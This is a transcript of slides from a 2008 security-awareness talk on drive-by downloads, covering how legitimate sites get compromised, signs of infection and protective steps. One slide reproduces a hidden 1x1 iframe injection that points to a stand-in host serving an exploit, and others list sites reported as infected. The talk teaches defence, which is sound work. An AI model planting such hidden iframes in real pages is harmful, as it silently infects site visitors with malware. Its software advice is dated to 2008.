Transcript Specifying Digital Forensics: A Forensics Policy Approach

Protecting Yourself On-line
Carol Taylor
Assistant Professor
Computer Science
EWU
QSI Conference
Skye Hagen
Asst Director
Office of Information
Technology, EWU
August 26-27, 2008
1
Overview
 Security User Responses
 Motivation
 Drive-by Downloads
 Defining
the problem
 Examples
 Recommendations
QSI Conference
August 26-27, 2008
2
User Survey
 How many people use Anti-virus?
 Do you keep it up to date?
 How many people use Spyware programs?
 Do you use firewall programs?

Windows Firewall, Comodo Firewall Pro (others)
 Do you back up the data on your computer?
QSI Conference
August 26-27, 2008
3
Motivation
 Why should you be concerned with Web
security?




I only shop at legitimate sites, I don’t ever visit
sites with questionable content
Is that enough to keep you safe?
That’s not enough to keep you safe in the
current Web environment
Surfing regular e-commerce sites can infect
your computer
QSI Conference
August 26-27, 2008
4
Motivation
 Statistics show that Web security is getting
worse


ScanSafe reported a 220 % increase in the
amount of Web-based malware over the
period between 2007-2008
The volume of backdoor and passwordstealing malware blocked by the firm
increased by an order of magnitude

855 % between May 2007 to May 2008
QSI Conference
August 26-27, 2008
5
Motivation
 A website infected with malware is detected
every five seconds (2008)

That represents a dramatic increase over the
last 12 months
 Websites poisoned with malware capable of
infecting visitors' machines are being
discovered at a rate of 16,173 per day

Three times faster than in 2007
http://www.reuters.com/article/pressRelease/idUS120735+23-Jul2008+BW20080723
QSI Conference
August 26-27, 2008
6
More Motivation
 Antivirus firm Sophos found that more than
90 % of web pages capable of spreading
Trojan horses and spyware are legitimate
websites


Recent infected websites include those of ITV,
Sony PlayStation, golf page on the BBC site,
and a variety of other commercial
Blogspot.com, the blog publishing system
owned by Google, was found to be hosting
two per cent of the world's web-based
malware in June 2008
QSI Conference
August 26-27, 2008
7
Motivation Summary
 The threats are real!!!!
 The Internet is an amazing collection of

Entertainment, knowledge, social opportunities
and goods but …
 The Internet is also a mirror for society



Crime, fraud, personal safety and privacy
threats are real, just like in the real world
The main difference is that the threats are
hidden, risk is not obvious
You must protect yourself from these real
dangers
QSI Conference
August 26-27, 2008
8
Drive-by Downloads
 This attack takes advantage of known vulnerabilities
in browsers and operating systems
 In a drive by an unsuspecting user (you) downloads
and installs software without ever knowing it while
they surf the web



Can happen when you agree to install browser plugins,
run a Java Applet, or Java Script or launch Active-X
applications
However it can also happen without you doing anything
There are Web pages modified with code that redirects
visitors to another site infected with malware that can
break into your PC, without you even realizing it
QSI Conference
August 26-27, 2008
9
Definitions
 Active X Control or Active X: A program,
developed which can be embedded in a web
page or downloaded from a web page and
executed from within the browser itself. A
browser must support ActiveX controls for this
to work
 Javascript: A scripting language, based on
both Java and C++, used to create code that
is commonly embedded into HTML on web
pages for enhanced functionality

For instance validation of user typed input on
a form
10
Definitions
 Java Applet: An applet is a small program,
usually embedded in a web page, which can
perform a number of duties such as playing
audio or video clips and querying a database.
These programs are normally written in Java
QSI Conference
August 26-27, 2008
11
Drive-by Downloads
 Unsuspecting users are victimized by simply
doing what they do hundreds of times each
day

Visiting a Web page
 Then, while you browse content normally,

A computer virus or Trojan horse program is
silently installed
QSI Conference
August 26-27, 2008
12
Drive-by Downloads
 Drive-by downloads are not new, but
criminals have seized on the tactic lately
because their success rate with traditional
e-mail viruses has tapered off
 Avoiding e-mail viruses is not always easy,
but more likely as long as you follow clear
rules like "don't click on any attachments"


But drive-by downloads are much more
sinister
No user interaction is generally required
beyond opening an infected site in a Web
browser
QSI Conference
August 26-27, 2008
13
Scope of the Problem
http://googleonlinesecurity.blogspot.com/2008/02/all-your-iframe-are-point-to-us.html
 Google crawled billions of Web pages and
found …

More than 3,000,000 unique URLs on over
180,000 web sites automatically installing
malware
Graph is % of daily Google
queries that contain at least
one harmful site in 2007
QSI Conference
August 26-27, 2008
14
Drive-by Downloads
 How Web Sites get infected
 One injection technique, gain access to the Web
Server that hosts the site




Attacker injects new content to the compromised
website
Typically, injected content is a link that redirects
visitors of these websites to a URL that hosts a script
crafted to exploit the browser
To avoid visual detection by website owners,
attackers use invisible HTML components
e.g., zero pixel IFRAMEs hide injected content
QSI Conference
August 26-27, 2008
15
Example of Web Server
Compromise – “Italian Job”



2007- Online criminals launched a Web attack that
compromised thousands of legitimate Web sites
Infected Web sites contain HTML "iFrame" code
that redirects victim's browser to server that
attempts to infect victim's computer
Internet Explorer, Firefox, and Opera are
vulnerable


Keyloggers and Trojan downloader program found on
compromised PCs so attackers can monitor victim's activity
and run other unauthorized programs on the computer
“They can turn your computer into anything they want”
http://www.networkworld.com/news/2007/061907-italian-job-web-attack.html
16
Example of Web Server
Compromise – iFrame Example
 Following code is injected into web pages
 Size of the in-line frame is 1 pixel by 1 pixel, so it is not visible to
the visitor of the site unless the person looks at the source code:
<iframe src= http://remote.example.com/index.html
frameborder="0" width="1" height="1" scrolling="no"
name=counter></iframe><html>
 Above server, remote.example.com index.html file contained
JavaScript code that attempted to exploit a recent Internet
Explorer vulnerability to download, install, and run a malicious
executable on the website visitor's computer
 Executable was recognized by about half of anti-virus tools as a
spyware trojan
17
Steps for Drive-by Download
Browser gets redirected
by hidden link,
remote.example.com
Downloads and
executes hidden
malware, from
index.html
QSI Conference
August 26-27, 2008
http://research.google.com/archive/provos-2008a.pdf
18
Drive-by Downloads
 How Web Sites get infected
 Another common injection technique
 Use websites that allow users to contribute their
own content
 Postings to forums or blogs


User contributed content may be restricted to text but
often can also contain HTML such as links to images
or other external content
Adversary can simply inject the exploit URL
without the need to compromise the web server
QSI Conference
August 26-27, 2008
19
Example of User Contributed
Content Compromise - Blog
 WordPress is the most popular software for
blogs

Should use the the current installation of
WordPress (WP) Version 2.5.1
 There is an increasing number of blogs, all
with version WP 2.3 and earlier


Getting “hit” by the well known iFrame exploit
that infects website visitors with a trojan
download
Advice from Marc Liron – Sitebuilder pro
QSI Conference
August 26-27, 2008
20
Example of User Contributed
Content Compromise - Blog
 Author, Marc Liron had trouble loading a site from
well known Internet Marketer, Stu McLaren
 So, he attempted to access Stu’s blog (June 2008)

http://myideaguy.com/blog/ (DO NOT GO THERE)
 A few moments after visiting the section:
 http://myideaguy.com/blog/category/products/
(DO NOT GO THERE)
 His installation of Kaspersky Security Suite
ALERTED that a TROJAN infection trying to infect
his computer!!!
 The culprit was: Trojan-Downloader.HTML.Agent.is
http://www.marcliron.co.uk/sitebuilditreview/
stu-mclarens-blog-gets-infected-by-hackers
21
Google Flags Malicious Sites
 Site has repeated problems

http://www.wowstatus.net/
 World of Warcraft site

Google flagged it as hosting malicious content

http://www.google.com/interstitial?url=http://www.wowstatus.net/
 One way sites are being flagged to alert you
 However not all sites are flagged ….
QSI Conference
August 26-27, 2008
22
Signs You are Infected
 Spyware alerts after you have visited a site
 See a program pop up that you never loaded

Asks you to do something (don’t do it!)
 Web browser’s home page changed
 Browser has new book marks
 Pop-up window advertisements
 Unusual files on your computer
QSI Conference
August 26-27, 2008
23
How to Protect Yourself
QSI Conference
August 26-27, 2008
24
User Behavior
 If you think you have been infected,






Don’t say yes to anything
Close pop-up windows that appear
You get an offer to help you clean up your
computer, remove spyware
As one researcher put it
“I rob you, then I run back and offer to help
identify the culprit that did it”
Not too helpful …
QSI Conference
August 26-27, 2008
25
Example Problem Pop-UP
If you click "Yes,"
spyware is installed.
Note the presence of
a security
certificate is no
guarantee that
something
is not spyware.
QSI Conference
August 26-27, 2008
26
Protection from Drive-by
Downloads
 Keep Operating system patched and up
to date
Turn on automatic updates for OS
 Windows XP
 Settings, Choose Control Panel then
System
 Open the System Tool
 Turn on Automatic Updates

QSI Conference
August 26-27, 2008
27
Protection from Drive-by
Downloads
 Use the latest browser, Firefox, IE Explorer, Opera
 Keep browsers patched and up to date

Turn on automated updates for Browser

Firefox, current version, 2.0.0.16 and
automatic update is enabled by default
 But to see the option type,
 Go to tools > Options > Advanced > Update

IE Explorer is up to version 7



Was an automatic update by MS
Use this latest version!!!
Has phishing protection built in
28
Protection from Drive-by
Downloads
 Install several programs for removing
spyware and viruses – These are free!!!

Adaware SE


Spybot Search and Destroy


http://lavasoft.com/single/trialpay.php
http://www.safer-networking.org/en/index.html
AVG – virus program

http://free.avg.com/

Avira AntiVir – Another Virus program

http://www.free-av.com/
http://www.viewpoints.com/Avira-AntiVir-Personal-EditionClassic-review-5ed20

29
Protection from Drive-by
Downloads
 Harden your Web browser

Medium security is not good enough



Set it to higher
Disable active scripting or have it prompt you
If have problems, add sites to an accepted list
Firefox
IE7
Open the “Tools” menu
Select “Options”
Click “Content”.
Click the check box to the left of
“Disable JavaScript” so that a tick
appears.
Open the “Tools” menu. Select
“Internet Options…”, Click the
“Security” tab. Click the “Internet”
symbol (a globe)
Click the “Custom Level…” In the
Settings list, scroll down to
“Scripting”.
Under Active Scripting, 30
August 26-27, 2008
click “Disable”
QSI Conference
Protection from Drive-by
Downloads
 Another way to protect yourself is by
virtualizing your Web session
 Using ZoneAlarm’s ForceField
 The virtualization technology in ForceField forms a
"bubble of security" around the Web browser so that all
unknown or unwanted changes from drive-by
downloads, are made to a virtualized file system
 Disappear completely once the user is finished
surfing
 ForceField's virtualization claims to offer additional
security by protecting the browser session from any
malware that might be on the PC
31
http://www.zonealarm.com/store/content/catalog/products/zonealarm_forcefield.jsp
More protection using a free
browser toolbar
 Haute Secure

A company started by Microsoft employees
Produce a free toolbar supposed to protect
you from bad web sites
Seems to be a good product
Can try it and report back

http://hautesecure.com/solutions.aspx



QSI Conference
August 26-27, 2008
32
Summary
 Internet is a scary place
 Great place to hang out but …
 Dangerous too
 Ignore Security? Sure ….




Result is your computer can be used for spam
or to commit crime
Your sensitive data can be compromised
You will be a victim of theft
Your computer may be unusable
 Pay some attention, get or buy security
software … Security is a process!!!
33
Resources
EWU Security Awareness Site
http://www.ewu.edu/securityawareness
SANS Reading Room – lots of technical papers
http://www.sans.org/reading_room/
Drive-by Download Video
http://video.google.com/videoplay?docid=3351512772400238297&ei=IPK0SLreOZTcqgOWjum9DA&q=Driv
e+by+download+%2B+watchgaurd&hl=en
 StopBadware.org – search for bad websites
http://www.stopbadware.org/home/clearinghouse
 Re-installing Windows XP – last resort 
http://www.pcworld.com/article/129977/
how_to_reinstall_windows_xp.html
34
This presentation can be found at
http://www.ewu.edu/securityawareness
My email: [email protected]
Questions
35